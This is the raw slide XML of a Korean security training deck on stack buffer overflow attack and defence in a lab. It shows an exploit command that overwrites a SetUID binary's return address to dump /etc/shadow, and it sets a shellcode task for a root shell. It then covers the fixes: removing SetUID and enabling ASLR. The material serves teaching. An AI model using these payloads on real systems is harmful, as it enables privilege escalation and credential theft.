              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364E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91" y="3862882"/>
            <a:ext cx="3070601" cy="249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7" name="_x564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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1" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="237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144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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 실행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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40"‘)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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나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인텔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x86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및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x64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아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언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(little endian)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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4070331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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3C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78" y="842130"/>
            <a:ext cx="4945761" cy="2744597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7EB1C4-726B-4F6C-863A-6B565A966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289945"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="1711135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1368581315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749492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140817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/shadow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root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외의 사용자는 접근할 수 없다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8783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350AC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65" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34D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65" y="5242131"/>
            <a:ext cx="3413125" cy="56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6ED209E0-61F7-41D0-8AA4-527392A4E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197" y="42762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6F02A76-5DC1-47DA-9569-0C049FE31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730245"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393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61157822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049629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="359994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위의 경우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strcpy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 직후의 스택 구조는 다음과 같다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그러므로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foo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실행 종료 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0x0000000000400635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즉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bar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함수의 시작 주소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복귀한다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931332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263B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716" y="1079106"/>
            <a:ext cx="3297023" cy="267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CA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="19457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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내용을 파일에 출력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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt; 1.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck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파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99C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2473" y="5036948"/>
            <a:ext cx="5408912" cy="35955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89701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FB783FB6-F004-4D8A-9A51-99B6118E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/Intro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해킹 시연</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4940BB54-D4E6-4689-9291-3F6BA3ACED57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5B9977C2-3518-44F2-B5FC-D27847E332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5841180"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1325564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4532244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="265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링크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내용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3706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2651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3" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=fDXQYezdcIQ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/>
                        <a:t>Mysql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취약점을 이용하여 공격자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>pc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exploit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585991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2651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4" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=MA6ugSrB8eY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지뢰찾기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Crack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651176"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265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5" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>https://www.youtube.com/watch?v=jZPudR4pWxM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스마트홈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기능 취약점 공격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133713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265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401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7580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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411A4485-4317-4F31-A74B-0E009D382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hlinkClick r:id="rId3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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8.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Buffer Overflow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공격 및 방어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대응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/sec/bof64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파일에는 스택 버퍼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취약점이 존재한다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스택 버퍼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오버플로우가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발생하더라도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/shadow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파일이 출력되지 않도록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조치하시오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test / test123</a:t>
            </a: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1)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SetUID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제거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chmod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u-s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파일명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2) ASLR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활성화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sysctl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-w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kernel.randomize_va_space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=2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A091AA-30F6-4270-8E55-4E599BAF0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CA05AE-7C1C-425E-A911-D5525EA28A2E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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1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취약점을 이용하여 복귀 주소를 조작할 수 있다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취약점을 이용한 복귀 주소 조작에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B415383-2E2E-4BCE-85C7-5B35E10E2B32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4E1F945-D42A-4F25-B58D-E50A41EB32B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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A443AC1F-F004-4379-9D4E-3A82ABE02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82F75C4-5F19-47F6-8EB1-6AAF8693BF3C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(CentOS 6.4)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7721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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) /sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –l bof64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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 및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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> us- /sec/bof64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ls –l bof64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3) ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># sysctl –w kernel.randomize_va_space=2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C819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14" y="1286850"/>
            <a:ext cx="4085971" cy="693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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD83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28" y="2788920"/>
            <a:ext cx="4039489" cy="6400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F911AFB-14D1-43A0-92BB-DDE8EC186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964049"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="2686495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3879104180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004609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23354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SetUID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제거된 경우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root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권한이 아닌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bof64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실행한 계정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아래의 경우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test)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권한으로 실행되므로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/shadow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파일에 접근할 수 없다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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393A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91" y="4314277"/>
            <a:ext cx="4691063" cy="182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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB99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9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
            <a:ext cx="4843690" cy="491774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7B8B31A-EFFF-45B0-9BAA-885DBA00D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510080"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="22910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0260" marR="60260" marT="16660" marB="166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365321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="412223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ASLR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활성화되면 스택에 있는 </a:t>
                      </a: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변수의 주소가 실행시마다 변경됨을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영역의 주소는 바뀌지 않음을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0260" marR="60260" marT="16660" marB="166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801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D0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" b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="38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787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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경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su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test 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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점 이용 공격 수행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/sec/bof64 $(python -c 'print "A"*24+"\x35\x06\x40")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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABFA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86" y="1296225"/>
            <a:ext cx="4907534" cy="180733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1DB69B-C4ED-4FDF-8DE0-E8E414C60830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 계정으로 복귀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exit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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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check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82157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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4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쉘코드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실행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/sec/stack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파일에는 스택 버퍼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취약점이 존재한다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쉘 코드가 포함된 페이로드를 만드는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exploit.c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루트 쉘을 획득하라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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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test / test123</a:t>
            </a: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1)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디스어셈블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objdump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-M intel -d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바이너리 파일 이름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9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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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쉘코드를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주입 및 실행할 수 있다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95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95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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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95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취약점을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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주입 공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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5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(CentOS 5.11, 32-bit)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67414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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) /sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –l stack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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 존재함을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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble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 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d stack | more</a:t>
            </a:r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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A15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" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="394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64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B0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07" y="2386554"/>
            <a:ext cx="5012436" cy="280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66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB7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-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="144291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88A016-BAFF-492D-AA4E-0F78C665F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069219"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23356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516" marR="59516" marT="16454" marB="164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935082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
